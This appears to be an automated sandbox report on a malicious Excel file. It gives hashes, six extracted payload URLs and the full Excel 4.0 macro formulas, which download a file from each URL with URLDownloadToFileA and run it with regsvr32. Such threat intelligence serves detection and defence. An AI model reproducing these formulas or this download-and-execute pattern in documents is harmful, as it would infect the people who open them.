Static task
static1
Behavioral task
behavioral1
Sample
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30.xlsx
Resource
win10v2004-20240802-en
General
-
Target
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30
-
Size
38KB
-
MD5
6d1f1c5f427c72400803be74c7f0d5ad
-
SHA1
3157d59b9b5949dd60b81a9d1a6592813e0793ec
-
SHA256
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30
-
SHA512
fe31150d4435911a71e902fedea98d72551fd60ce329b675f4c5751453885704aba16b7ecccbc4c13140905f3cd3e82a595ae011c2e5cce5ec1a4716ee074d26
-
SSDEEP
768:nC/4614X7FEFu16j7hnyuYC+D5ozu2twUYkcABKM1+bB5lqHLAWUb5Gi:C/46qJEMUhS12twBjgUKS5Gi
Malware Config
Extracted
http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/
http://totalplaytuxtla.com/sitio/tEMOwWRh/
http://meca-global.com/wp-admin/zpM6L8KXY0H/
http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/
http://51.222.72.232/wp-includes/3ztqctcYr/
http://51.222.72.233/wp-includes/Xi60QX9khe/
-
Formulas (Excel 4.0 macro sheet)
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()
Signatures
Files
-
f2046cfee5491bf85983c55130bbac326ff17e0336d3b95177bd387e58bf1e30.xlsx office2007